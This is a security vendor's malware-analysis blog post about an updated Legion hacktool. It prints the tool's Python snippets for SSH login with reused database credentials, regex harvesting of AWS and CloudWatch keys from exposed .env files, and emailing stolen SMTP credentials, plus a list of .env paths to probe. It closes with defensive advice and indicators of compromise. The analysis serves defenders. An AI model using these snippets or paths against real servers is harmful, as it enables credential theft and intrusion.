Updates to Legion: A Cloud Credential Harvester and SMTP Hijacker
Cado Labs recently discovered and reported on an emerging cloud-focused hacktool, designed to harvest credentials from misconfigured web servers and leverage these credentials for email abuse. The tool was named ‘Legion’ by its developers, and was distributed and marketed in various public groups and channels within the Telegram messaging service.
Cado researchers have now encountered what is believed to be an updated version of this commodity malware, with some additional functionality of interest to cloud security professionals.
SSH Abuse
In the sample of Legion previously analysed by Cado, the developers included code within a class named ‘legion’ to parse a list of exfiltrated database credentials and extract username and password pairs. The function then attempted to use these credentials in combination with a matching host value to log in to the host via SSH - assuming that these credentials were being reused across services.
To achieve this within Python, the Paramiko library (a Python implementation of the SSHv2 protocol) was used. However, in the original sample of Legion, the import of Paramiko was commented-out, making the code leveraging it redundant. In Legion’s most recent update, it appears that this functionality has been enabled.
if db_user and db_pass:
connected = 0
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(host, 22, db_user, db_pass, timeout=3)
fp = open('Results/!Vps.txt', 'a+')
build = str(host)+'|'+str(db_user)+'|'+str(db_pass)+'\n'
remover = str(build).replace('\r', '')
fp.write(remover + '\n\n')
fp.close()
connected += 1
except:
pass
finally:
if ssh:
ssh.close()
Python snippet of Legion’s SSH connection code
Exploiting Additional Cloud Services
Legion’s credential gathering capabilities were discussed at length in Cado’s previous blog on the topic. Essentially, the malware hunts for environment variable files in misconfigured web servers running PHP frameworks such as Laravel. Legion attempts to access these .env files by enumerating the target server with a list of hardcoded paths in which these environment variable files typically reside. If these paths are publicly accessible, due to misconfigurations, the files are saved and a series of regular expressions are run over their contents.
From the searches performed on the environment variable files, it’s easy to determine the services the malware attempts to retrieve credentials for. In the updated version of Legion, we can see the malware searching for credentials specific to the following services/technologies:
- DynamoDB
- Amazon CloudWatch
- AWS Owl (believed to be this project: https://github.com/ab/aws-owl)
For CloudWatch specifically, the malware searches for the environment variable CLOUDWATCH_LOG_KEY. This variable name appears in the documentation for public Laravel projects, including a project for handling CloudWatch logging in Laravel. This fits with Legion’s capabilities, as the tool’s credential harvesting feature targets Laravel apps.
elif "CLOUDWATCH_LOG_KEY" in str(text):
if "CLOUDWATCH_LOG_KEY=" in str(text):
method = '/.env'
try:
aws_key = reg("\nCLOUDWATCH_LOG_KEY=(.*?)\n", text)[0]
except:
aws_key = ''
try:
aws_sec = reg("\nCLOUDWATCH_LOG_SECRET=(.*?)\n", text)[0]
except:
aws_sec = ''
try:
asu = legion().get_aws_region(text)
if asu:
aws_reg = asu
else:
aws_reg = ''
except:
aws_reg = ''
Parsing .env files for the value of CLOUDWATCH_LOG_KEY
elif "AWSOWL_ACCESS_KEY_ID" in str(text):
if "AWSOWL_ACCESS_KEY_ID=" in str(text):
method = '/.env'
try:
aws_key = reg("\nAWSOWL_ACCESS_KEY_ID=(.*?)\n", text)[0]
except:
aws_key = ''
try:
aws_sec = reg("\nAWSOWL_SECRET_ACCESS_KEY=(.*?)\n", tex
except:
aws_sec = ''
try:
asu = legion().get_aws_region(text)
if asu:
aws_reg = asu
else:
aws_reg = ''
except:
aws_reg = ''
Parsing .env files for the value of AWSOWL_ACCESS_KEY_ID and AWS_OWL_SECRET_ACCESS_KEY
Miscellaneous Updates
Aside from general refactoring, the Legion developers have made some additional updates to the hacktool.
One such update is a change to the subject line of test emails sent by the malware, which now include a reference to “King Forza”. The Forza name was also used in a YouTube channel linked by Cado researchers to the operators of the Legion malware.
smtp_server = str(mailhost)
login = str(mailuser.replace('"', '')) # paste your login generated by Mailtrap
password = str(mailpass.replace('"', '')) # paste your password generated by Mailtrap
receiver_email = emailnow
message = MIMEMultipart('alternative')
message['Subject'] = f'King Forza SMTP | {mailhost} '
message['From'] = sender_email
message['To'] = receiver_email
text = ' '
html = f" <h3>King Forza smtps! - SMTP Data for you!</h3><br>{mailhost} <br><br><h5>Mailer King with from</h5><br>==================<br><i>{mailhost}:{mailport}:{mailuser}:{mailpass}:{mailfrom}:ssl::::0:</i><br>==================<br><br><h5>Mailer king Normal</h5><br>==================<br>{mailhost}:{mailport}:{mailuser}:{mailpass}::ssl::::0:<br>==================<br><br> "
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
message.attach(part1)
message.attach(part2)
Snippet showing updated subject line, including Forza name
Another update included adding additional paths to enumerate for the existence of .env files. The new paths can be seen in the following table:
/lib/.env |
/lab/.env |
/cronlab/.env |
/cron/.env |
/core/app/.env |
/core/Datavase/.env (sic) |
/database/.env |
/config/.env |
/apps/.env |
/uploads/.env |
/sitemaps/.env |
/saas/.env |
/api/.env |
/psnlink/.env |
/exapi/.env |
/site/.env |
/web/.env |
/en/.env |
/tools/.env |
/v1/.env |
/v2/.env |
/administrator/.env |
Conclusion
Legion is an actively developed hacktool, specifically designed to exploit vulnerable web applications in an attempt to harvest credentials. Legion focuses primarily on retrieving credentials for SMTP and SMS abuse. However this recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications. It’s clear that the developer’s targeting of cloud services is advancing with each iteration.
Detection and prevention advice remains consistent with Cado’s prior blog on this malware family. Misconfigurations in web applications are still the primary method used by Legion to retrieve credentials. Therefore, it’s recommended that developers and administrators of web applications regularly review access to resources within the applications themselves, and seek alternatives to storing secrets in environment files.
Advice to AWS users around detecting Legion activity also remains unchanged. The malware creates an IAM user and sets the tag “Owner” to the value “ms.boharas”. This is a strong indicator of compromise by the malware, and can be used for detection engineering and investigations.
Are you interested in seeing the Cado Cloud Forensics and Incident Response platform in action? Schedule a demo with our team or check out our 14-day free trial.
For more information on responding to incidents in AWS, check out our free playbook the "Ultimate Guide to Incident Response in AWS".
Indicators of Compromise (IoCs)
Filename | SHA256 |
og.py | 6f059c2abf8517af136503ed921015c0cd8859398ece7d0174ea5bf1e06c9ada |
User Agents |
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36 |
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50 |
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36 |
Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 |
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 |
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 |
More from the blog
View All PostsLegion: an AWS Credential Harvester and SMTP Hijacker
April 13, 2023How To Use YARA Rules To Detect Emerging Cloud-Based Threats
April 10, 2024The Nine Lives of Commando Cat: Analysing a Novel Malware Campaign Targeting Docker
February 1, 2024Subscribe to Our Blog
To stay up to date on the latest from Cado Security, subscribe to our blog today.